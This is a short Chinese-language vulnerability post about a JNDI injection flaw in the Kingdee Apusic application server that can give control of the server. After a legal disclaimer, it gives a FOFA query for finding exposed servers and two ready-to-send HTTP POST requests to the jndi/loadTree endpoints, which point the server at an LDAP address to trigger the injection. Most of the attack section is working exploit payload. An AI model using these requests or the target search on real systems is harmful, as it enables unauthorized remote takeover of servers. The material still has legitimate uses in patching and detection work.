免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞描述
金蝶Apusic应用服务器存在JNDI注入漏洞,攻击者可利用该漏洞获取服务器控制权限。
资产测绘
FOFA:app="Apusic应用服务器"
漏洞复现
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept-Encoding: gzip, deflate
Accept: image/avif,image/webp,*/*
Connection: close
jndiName==ldap://地址
POST /admin/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept-Encoding: gzip, deflate
Accept: image/avif,image/webp,*/*
Connection: close
jndiName==ldap://地址